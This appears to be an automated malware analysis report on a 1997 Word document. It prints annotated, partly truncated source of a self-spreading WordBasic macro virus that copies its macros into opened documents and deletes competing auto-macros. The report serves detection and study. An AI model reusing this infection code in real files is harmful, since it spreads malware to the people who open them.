Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc5b44a95ac0ed0f…

MALICIOUS

Office (OLE)

64.5 KB Created: 1997-03-23 09:47:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f64cf747556fb7ee314b182989c4ff0a SHA-1: be8f088f2f0c8b57180b3175a23eaa6cda0416f2 SHA-256: bc5b44a95ac0ed0f22bbd0ba9eedd0eeca2bae99ba44db7ceb27c1390573fac6
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

This document exhibits the characteristics of a legacy macro virus, specifically identified by the 'RSN MACRO VIRUS' markers and the presence of VBA macros. The AutoOpen and Auto_Close macros indicate that the code is meant to run automatically when the document is opened and closed, most likely to infect other documents and spread. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6965646-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6965646-0
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers — AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro — or the names of known historical macro viruses. These old Word 6/95 macro forms are not stored as a modern VBA project, so standard VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41224 bytes
SHA-256: 189bf1195235b79f1ce58ce51fa06a85c04d2b1e4234aef26d75a9ae823a30ff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: the ThisDocument module carries only exporter metadata
' (module name, base identifier, instancing flags) and no procedures. All of
' the code visible in this preview lives in the "AutoOpen" module that follows.

Attribute VB_Name = "AutoOpen"
' Analyst note: in this legacy WordBasic layout the macro *is* the module, so
' a module named "AutoOpen" is the code that runs when the document is opened.
' Its entry point is Sub MAIN below (see its VB_Invoke_Func attribute,
' "TemplateProject.AutoOpen.MAIN").

'Einsteinium v.1.1.  (White Virus)
'Solidarity  M  Forever
'Medan 1997

' Module-level state shared by MAIN, CariTujuan, CheckFile and TularFile.
'   F$          - name of the document being processed (WordBasic.FileName$)
'   tj$         - path of the template that serves as the macro source, as
'                 located by CariTujuan, or the sentinel "zxz" when none
'                 could be found (TularFile checks for that value)
'   k           - candidate count produced by CariTujuan (its parameter k
'                 shadows this module-level k)
'   ca, cn      - WordBasic.CountMacros results (set in MAIN / CariTujuan)
'   FM1$..FM3$  - names of the virus's own three macros as found by CheckFile
'   a           - cleared in MAIN, read by TularFile (a < 4)
'   ww          - read by MAIN after CheckGlobal; never assigned in this
'                 excerpt, presumably set by CheckGlobal (not shown)
'   gd, xm$     - cleared in MAIN, otherwise unused in this excerpt
'   xo$..xg$    - macro/file name strings; MAIN clears them to "" and nothing
'                 visible assigns them, yet CariTujuan and TularFile read
'                 them, so Singkat (called first in MAIN, not shown)
'                 presumably fills them in - confirm against the full source
Dim F$, ww, cn, ca, a, tj$, k, gd, FM1$, FM2$, FM3$, xo$, xc$, xt$, xm$, xf$, xe$, xn$, xg$

' Entry point of the AutoOpen macro (see VB_Invoke_Func below). Resets all
' module-level state, re-saves the current document in Format 1 when it is
' not already in that format, locates the macro source template (CariTujuan),
' reconciles the macros held in the current file (CheckFile), then runs
' Tutup and Aksi. Singkat, CheckGlobal, Tutup and Aksi are not included in
' this preview, so their effect cannot be stated from here.
Public Sub MAIN()
Attribute MAIN.VB_Description = "3Ein.steinium1"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
' The description "3Ein.steinium1" doubles as the self-recognition marker:
' CheckFile reads MacroDesc$ and matches Mid(desc, 2, 3) = "Ein". A macro
' description carrying this prefix is therefore a usable detection indicator.
Dim wn$
' Reset every module-level variable at the start of each run.
F$ = ""
ww = 0
cn = 0
ca = 0
a = 0
tj$ = ""
k = 0
gd = 0
FM1$ = ""
FM2$ = ""
FM3$ = ""
xo$ = ""
xc$ = ""
xt$ = ""
xm$ = ""
xf$ = ""
xe$ = ""
xn$ = ""
xg$ = ""
' DisableInput 1 / DisableInput 0 bracket the whole routine; by its name this
' presumably blocks user interruption while the macro runs - confirm in the
' WordBasic reference.
WordBasic.DisableInput 1
F$ = WordBasic.[FileName$]()
' Skip the infection path when the file has no name or its name starts with
' "DOCUMENT" (presumably an unsaved default-named document) and go straight
' to the m1 tail (Tutup / Aksi).
If F$ = "" Or UCase(WordBasic.[Left$](F$, 8)) = "DOCUMENT" Then GoTo m1
Singkat
wn$ = WordBasic.[WindowName$]()
' Read the current FileSaveAs settings; if Format is 0 the file is re-saved
' with Format 1. NOTE(review): in WordBasic, Format 1 appears to be the
' template format, i.e. the form that can hold macros - verify against the
' WordBasic reference; CariTujuan also saves its new file with Format:=1.
Dim fsa As Object: Set fsa = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs fsa
If fsa.Format = 0 Then
    fsa.Format = 1
    WordBasic.FileSaveAs fsa
    F$ = WordBasic.[FileName$]()
End If
' Locate or create the macro source template (sets tj$ and cn). The
' parentheses around k pass the argument by value in VBA, so the count
' computed inside CariTujuan does not flow back here; MAIN never reads k
' afterwards in this excerpt.
CariTujuan (k)
WordBasic.Activate wn$
' Macro count for context 1 (presumably the active document/template -
' confirm); used by CheckFile as the loop bound.
ca = WordBasic.CountMacros(1)
CheckFile
If ca = 0 Then GoTo m1
CheckGlobal
' ww is only read here; it is expected to be set by CheckGlobal (not shown).
If ww <> 0 Then WordBasic.FileSaveAll 1
m1:
Tutup
Aksi
WordBasic.DisableInput 0
End Sub

' Locates the template that acts as the macro source and records its path in
' tj$; k counts how many candidates were found. Search order:
'   1. a loaded add-in whose name ends in "NARMOL.DOT";
'   2. a file named xn$ inside the DefaultDir$(8) directory;
'   3. otherwise a new document saved in that directory as xn$ with Format 1.
' When DefaultDir$(8) is empty tj$ becomes the sentinel "zxz", which
' TularFile uses to switch from Organizer to MacroCopy. Also sets cn.
' Note: k here is the parameter and shadows the module-level k.
Private Sub CariTujuan(k)
Dim i
Dim AN$
Dim su$
Dim CD$
i = 1
k = 0
' Scan the add-in list for NARMOL.DOT. On a hit: remember it, force the loop
' to end by setting i to the add-in count, and call AddInState with 1
' (presumably "loaded" - confirm).
While i <= WordBasic.CountAddIns()
    AN$ = WordBasic.[GetAddInName$](i)
    If UCase(WordBasic.[Right$](AN$, 10)) = "NARMOL.DOT" Then
        tj$ = AN$
        k = k + 1
        i = WordBasic.CountAddIns()
        WordBasic.AddInState AN$, 1
    End If
    i = i + 1
Wend
' NOTE(review): DefaultDir$ type 8 looks like the Word startup path, which
' would make anything saved there auto-load - verify against the WordBasic
' reference before relying on this.
su$ = WordBasic.[DefaultDir$](8)
' Look for an existing xn$ in that directory; CD$ apparently captures the
' current directory so it can be restored afterwards.
If k < 1 And su$ <> "" Then
    CD$ = WordBasic.[Files$](".")
    WordBasic.ChDir su$
    If WordBasic.[Files$](xn$) <> "" Then
        k = k + 1
        tj$ = su$ + "\" + xn$
    End If
    If CD$ <> "" Then WordBasic.ChDir CD$
End If
' Still nothing: create the file. "On Error GoTo -1" clears any pending error
' state before installing the ct1 handler, so a failed FileSaveAs jumps past
' the k = k + 1 and is otherwise ignored.
If k < 1 And su$ <> "" Then
    tj$ = su$ + "\" + xn$
    WordBasic.FileNew
    On Error GoTo -1: On Error GoTo ct1
    WordBasic.FileSaveAs Name:=tj$, Format:=1
    k = k + 1
ct1:
End If
' No usable directory at all: mark tj$ with "zxz" and count macros in
' context 0; otherwise use the three-argument CountMacros form (the meaning
' of those arguments is not established here - consult the WordBasic ref).
If k < 1 And su$ = "" Then
    tj$ = "zxz"
    cn = WordBasic.CountMacros(0)
Else
    cn = WordBasic.CountMacros(0, 0, 1)
End If
End Sub

' Inventories the ca macros of context 1 (ca is counted in MAIN) and decides
' whether the file needs (re)infection:
'   - macros accepted by Tes() (not shown) are treated as the virus's own;
'     characters 2-4 of their description ("Ein"/"han"/"pen") map them to
'     FM1$/FM2$/FM3$ and o counts them;
'   - any other macro named AUTOOPEN or AUTOCLOSE is collected in sp__$ and
'     then removed through Organizer, i.e. competing auto-macros are deleted;
'   - when the three own macros are not all present, TularFile is called.
' Reads F$ and ca; writes FM1$..FM3$. Tes and TularFile are defined elsewhere.
Private Sub CheckFile()
Dim o
Dim x
Dim h
Dim MA$
Dim MD$
Dim si$
Dim j
' A file holding no macros at all is handed to TularFile immediately; the
' loop below then runs zero times and the final TularFile call is skipped.
If ca = 0 Then TularFile
o = 0
ReDim sp__$(ca)
x = 0
For h = 1 To ca
    MA$ = WordBasic.[MacroName$](h, 1)
    MD$ = WordBasic.[MacroDesc$](MA$)
    If Tes(MD$) = 1 Then
        ' Self-recognition through the description prefix (cf. MAIN's
        ' description "3Ein.steinium1", whose chars 2-4 are "Ein").
        si$ = Mid(MD$, 2, 3)
        If si$ = "Ein" Then
            FM1$ = MA$
        ElseIf si$ = "han" Then
            FM2$ = MA$
        ElseIf si$ = "pen" Then
            FM3$ = MA$
        End If
        o = o + 1
    ElseIf UCase(MA$) = "AUTOOPEN" Or UCase(MA$) = "AUTOCLOSE" Then
        ' Foreign auto-macro: queue its name for deletion.
        x = x + 1
        sp__$(x) = MA$
    End If
Next h
' Nothing to remove and all three own macros present: nothing more to do.
If x = 0 And o = 3 Then GoTo cf1
' Delete each queued foreign auto-macro unless Tes() now claims it; any
' Organizer error is swallowed by the jump to the lain label inside the loop.
If x > 0 Then
    For j = 1 To x
        MD$ = WordBasic.[MacroDesc$](sp__$(j))
        If Tes(MD$) = 1 Then GoTo lain
        On Error GoTo -1: On Error GoTo lain
        WordBasic.Organizer Delete:=1, Source:=F$, Name:=sp__$(j), Tab:=3
lain:
    Next j
End If
' Own macro set incomplete in a file that does have macros: (re)infect.
If o <> 3 And ca <> 0 Then TularFile
cf1:
End Sub

Private Sub TularFile()
Dim y
Dim i
Dim FM$
Dim GM$
ReDim SM__$(3)
ReDim TM__$(3)
If a < 4 Then TM__$(1) = xo$ Else TM__$(1) = xc$
TM__$(2) = pl$(y)
tf1:
TM__$(3) = pl$(y)
If UCase(TM__$(2)) = UCase(TM__$(1)) Then GoTo tf1
SM__$(1) = xe$
SM__$(2) = xf$
SM__$(3) = xt$
For i = 1 To 3
    If tj$ <> "zxz" Then
        On Error GoTo -1: On Error GoTo tf2
        WordBasic.Organizer Copy:=1, Source:=tj$, Destination:=F$, Name:=SM__$(i), Tab:=3
        WordBasic.Organizer Rename:=1, Source:=F$, Name:=SM__$(i), NewName:=TM__$(i), Tab:=3
tf2:
    Else
        FM$ = F$ + ":" + TM__$(i)
        GM$ = xg$ + SM__$(i)
        On Error GoTo -1: On Error GoTo tf3
        WordBasic.MacroCopy GM$, FM$,
... (truncated)